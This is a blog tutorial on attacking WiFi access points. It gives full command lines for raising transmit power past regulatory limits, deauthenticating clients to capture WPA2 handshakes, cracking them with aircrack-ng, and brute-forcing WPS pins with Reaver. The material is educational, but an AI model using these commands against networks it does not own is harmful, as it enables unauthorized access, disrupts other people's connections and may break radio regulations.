Welcome to part three of a five (six?) part series on WiFi security and lack thereof. In the last article we covered basic WiFi recon on Linux and prepared for what we will be covering in this one — attacking wireless access points. I highly recommend you read the previous article before following along, or be sure you’re already familiar with basic packet-sniffing techniques and command-line tools such as airodump-ng, tcpdump, iw, iwconfig… you know, WiFi stuff.
Rules and Regulations
Before we start with the fun attacking stuff I want to show you a little trick that will not only come in handy later in this post, but in the next one as well. We are going to increase our wireless adapter’s transmission power, or txpower. As with the last couple articles we will be using the adapter name ‘alfa’. If you’re following along you’ll want to either rename your adapter, or replace ‘alfa’ with your own adapter name.
Ok, first let’s get some info.
dj@siriusA # iw reg getglobal
country 00: DFS-UNSET
(2402 - 2472 @ 40), (N/A, 20), (N/A)
(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM, PASSIVE-SCAN
(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW, PASSIVE-SCAN
(5490 - 5730 @ 160), (N/A, 20), (0 ms), DFS, PASSIVE-SCAN
(5735 - 5835 @ 80), (N/A, 20), (N/A), PASSIVE-SCAN
(57240 - 63720 @ 2160), (N/A, 0), (N/A)<snip>
What we’re doing here is requesting the regulatory domain information of our adapter. What is regulatory domain information you ask? Well, organizations such as the FCC create special country-specific legal regulations regarding how radio signal transmitting devices such as wireless adapters and antennae are to be used. These regulations include things such as how powerful the radio signal transmission can be. If you take a look at the above output you’ll see that the numbers go up to 2494 before changing to 5170. This number corresponds to radio frequency. Remember changing the channel our WiFi adapter is listening on in the last post? Now if we look a little further in the output…
phy#0 (self-managed)
country US: DFS-UNSET
(2402 - 2437 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-80MHZ, NO-160MHZ
(2422 - 2462 @ 40), (6, 22), (N/A), AUTO-BW, NO-80MHZ, NO-160MHZ
(2447 - 2482 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-80MHZ, NO-160MHZ
(5170 - 5190 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-160MHZ
(5190 - 5210 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-160MHZ
(5210 - 5230 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-160MHZ
(5230 - 5250 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-160MHZThis information pertains to the United States. As you can see, the number stops at 2482 before switching to 5170. This is the highest frequency in the 2.4 GHz range that the FCC allows wireless adapters to go in the US. Think 2.482 (GHz). Check it out.
dj@siriusA # sudo iwconfig alfa channel 14
dj@siriusA # iwconfig alfa
alfa IEEE 802.11 ESSID:off/any
Mode:Managed Frequency:2.484 GHz Access Point: Not-Associated
Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:offYou can see the frequency is set at 2.484 GHz. As a side note, notice that the Tx-Power field is set at 20dBm. Ok, now try setting the frequency higher.
dj@siriusA # sudo iwconfig alfa channel 15
Error for wireless request "Set Frequency" (8B04) :
SET failed on device alfa ; Invalid argument.Fun stuff. Now if I’m being honest I’m not exactly sure why iw reg get shows 2482 as the highest number yet my network card listens on 2.484, so if you know the answer to that one let me know. You may have just caught me giving you misinformation. I encourage you to read more about it here. Time to start messing with the transmission settings.
Powering Up
So earlier in the ‘iw reg get’ output we saw a line
country 00: DFS-UNSETWe will need to set a country code in order to be able to change the txpower. You will want to set it to a country code that isn’t regulated by the FCC.
dj@siriusA # sudo iw reg set BTI chose Bhutan because, well, I’m lazy and that country code was at the top of a list somewhere.
dj@siriusA # sudo ip link set alfa down
dj@siriusA # sudo iw dev alfa set txpower fixed 30mBm
dj@siriusA # iwconfig alfa
alfa IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:offWe’ve now set the Tx-power ten decibel-milliwats higher to 30 dBm. Cool. You don’t really get to immediately benefit from that, but, now you know how. Like I said, this will come in handy later. Oh, one more thing. As I stated earlier, organizations like the FCC regulate this sort of thing for a reason, so this may be illegal in your country. Go check. Or don’t. Whatever.
Cracking WPA2 Authentication
Normally these sorts of articles start with cracking WEP and then graduate to WPA/WPA2 networks. While I agree that it’s important to learn your history before you start trying to pave a path through this brave new world, there are many great articles that cover cracking WEP networks better than I could. Not only that, but I haven’t seen very many WEP networks around recently, have you? Don’t let me stop you from learning about it if you want to though. Aircrack’s article never fails.
For those of you who don’t know, WPA stands for WiFi Protected Access. WPA is an encryption standard used to protect wireless communications. It was created as a replacement for WEP encryption which had glaring vulnerabilities making it extremely trivial to break the encryption. In 2004 WPA2 was introduced to improve upon WPA by utilizing the military-grade AES cipher making it a much more resilient security protocol. However, at the ripe old age of seventeen, WPA2 is something of a dinosaur and vulnerabilities such as the KRACK (Key Reinstallation Attack) have since been discovered. That attack, and the recent WPA3 which improves upon many aspects of WPA2, are outside the scope of this tutorial.
Without further ado, let’s get started.
Choosing the Target
First thing we’ll do is set our adapter into monitor mode and start observing traffic on nearby networks. Chances are you’re hoping to crack the password of a specific access point, so you’ll want to keep an eye out for your target’s MAC address.
dj@siriusA # sudo ip link set alfa down
dj@siriusA # sudo iwconfig alfa mode monitor
dj@siriusA # sudo ip link set alfa up
dj@siriusA # sudo airodump-ng alfaIn this case I’ll chose an access point I own because I’m blogging on the internet and attacking your neighbor’s router is rude. Aside from the MAC address you’ll also need to take note of the channel the access point is operating on. My access point appears to be operating on channel 1.
sudo airodump-ng --bssid DC:FE:07:FF:83:D8 -c 1 alfa -w outputWe told airodump-ng to only observe traffic pertaining to the access point with the above MAC address. The -c flag ensures we are listening on the right frequency and the -w flag dumps all captured traffic to a series of files prepended with the name ‘output’. We need to dump the traffic in order to be able to crack it later.
Now we can observe traffic between our target access point and any clients connected to it without all the other noise. You can see above that there is one client connected to the access point.
Getting Intrusive
At this point in the process there are a couple ways you can proceed. We need to be able to witness a client connecting to the access point so we can capture the 4-way handshake we talked about in the first article of this series. In order to do that we can do a number of things. The first is to simply wait. Eventually someone is bound to connect to the access point, and when they do we will be there to intercept the handshake. Obviously you’ll want to make sure you’re close enough to the access point to be able to see this happen. The second thing we can do is more aggressive. The aircrack-ng suite has a utility called aireplay-ng which allows us to inject packets into the network. If this is the route you choose it’s a good idea to test to be sure we can actually inject successfully. We will use the connected client we saw just a minute ago.
dj@siriusA # sudo aireplay-ng -e 86:EE:B0:38:E6:ED -a DC:FE:07:FF:83:D8 --test alfa02:29:33 Trying broadcast probe requests...
02:29:33 Injection is working!
02:29:35 Found 1 AP02:29:35 Trying directed probe requests...
02:29:35 DC:FE:07:FF:83:D8 - channel: 1 - '86:EE:B0:38:E6:ED'
02:29:35 Ping (min/avg/max): 1.390ms/3.697ms/6.534ms Power: -26.73
02:29:35 30/30: 100%
If you are seeing this output then congrats, you can successfully inject packets into the target network. Next we will use the same utility to inject de-authentication packets into the network to force the specific client to reconnect to the access point, forcing a handshake.
sudo aireplay-ng -0 1 -a DC:FE:07:FF:83:D8 -c 86:EE:B0:38:E6:ED alfaLook for a WPA handshake in the upper right corner of the airodump-ng output.
If you see this you’ve successfully forced the client to re-authenticate and captured the resulting 4-way handshake. You’re almost there. It’s important to realize that going this route is extremely noisy and will almost certainly be noticed by detection systems if you’re trying to perform this attack in a corporate setting. At the very least, the client you just de-authed will notice a momentary lapse in connectivity. If you try this at a bar, the jukebox you inadvertently disconnected may stop playing music for a moment and announce to a room full of hot-blooded drunk apes that their buzz has been temporarily killed. Choose your targets wisely.
In the past I’ve found that aireplay-ng doesn’t inject on the right channel. As long as airodump-ng is still listening then this shouldn’t be an issue.
Going For the Kill
To be honest, this attack isn’t really all that sophisticated. All we’re really doing is performing some basic network sniffing, waiting for — or forcing — a client to initiate a 4-way handshake, and then once we’ve captured that and saved it to a file, we simply bruteforce it. That’s all there is to it. It’s actually rather mundane. Regardless, let’s make it happen.
sudo aircrack-ng -w wordlist.txt -b DC:FE:07:FF:83:D8 output*.capThis part depends largely on your wordlist and your patience. There are multiple ways to do this part too. If you don’t feel like using aircrack-ng you can also use a tool like hashcat which utilizes a GPU instead of a CPU to crack the hash. If you don’t have a computer with a GPU you can set up an AWS instance with a GPU. Both hashcat usage and AWS are outside the scope of this tutorial.
If time is of the essence then this attack isn’t necessarily practical as bruteforcing WPA and WPA2 hashes could take days. However, there are other ways if the circumstances are right.
Attacking Access Points With Reaver
Have you ever seen that button on your router that has the letters WPS somewhere near it? That button exists as a way for the every day homeowner to simplify the process of getting their access point set up, and getting devices connected to it without the hassle of configuring anything or entering in (hopefully) complex default credentials. It was introduced sometime in 2006 and it’s fairly convenient if you don’t like touching anything besides buttons, but it has some issues. The major issue is the fact that it utilizes an 8 digit pin to facilitate the connection. Not only that, but the last digit is a checksum meaning that there’s only 7 digits to guess. It’s probably not necessary to mention but I’ll do it anyway; a 7 digit pin doesn’t take all that long to bruteforce. Once an attacker has the pin they can get the WPA2 key. Let’s explore that.
dj@siriusA # sudo airodump-ng -W -w output alfa
You may have noticed that this airodump-ng output is slightly different then the previous on. We’ve added a -W flag to it in order to see each any access point’s WPS information, if it exists. We can see in the output that there are access points in the area with both version 1 and 2 of WPS. The one at the bottom with LAB and DISP next to it? That pertains to the WPS configuration methods available on the device. You can read more about it here.
Another way we could do this is with a utility called wash.
dj@siriusA # sudo wash -i alfa
Newer routers may not be vulnerable to this attack as it’s definitely not brand new, so bear with me.
Ok. Assuming you’ve found your target you just need to take note of the MAC address and channel. We will use a tool called Reaver which was made specifically for the purpose of bruteforcing WPS-enabled routers.
dj@siriusA # sudo reaver -i alfa -b DC:FE:07:FF:83:D8 -d 3 -vvLN -c 1This will perform an online bruteforce of the WPS pin. The fact that it’s an online attack is exactly the reason why we learned how to increase our wireless adapter’s Tx-power earlier in this post. If your signal is too weak you may not be able to carry out this attack successfully. You may see something liek this in the resulting output.
If this happens I’ve found increasing the Tx-power to be helpful, or to change the delay on the transmission. That’s what the -d flag is for. The other thing about this being an online attack is that, like the previous attack, this is extremely noisy. Save this attack method for helping your safety pin-averse friends recover their router’s password.
There is also a version of this attack called a pixiedust attack. Essentially, the lack of randomization in the WPS pin makes it possible for offline attacks to occur as well. In order to implement this using Reaver just add the -K flag. I’ve had success with both and depending on the age and make of the access point you may find yourself discovering the password in as little as a few minutes.
Letting The (pixie) Dust Settle
I mentioned this earlier, but I’ll say it again for good measure; both of these attacks are more then a little old at this point. The WPS attack we just covered was discovered way back in 2011 making it older then our last significant end-of-the-world prediction. So old, in fact, that I almost didn’t post it on the internet at all due to lack of relevance. However, this was one step along a path I paved for myself awhile back and I gained quite a bit of fundamental knowledge along the way. I felt I owed it to the community at large to share my interpretation of that knowledge regardless of it’s relevance in 2021. I hope you gained something from this article. If nothing else, perhaps it will inspire you to get yourself set up with an access point made after 2012. Your home network deserves it.
If you’ve kept up thus far I feel I owe you a beer or something. In the next article we are going to pivot from attacking infrastructure to something that hopefully make you suspicious the next time you see an open WiFi network at your local artisanal bean-water shop. See you soon.
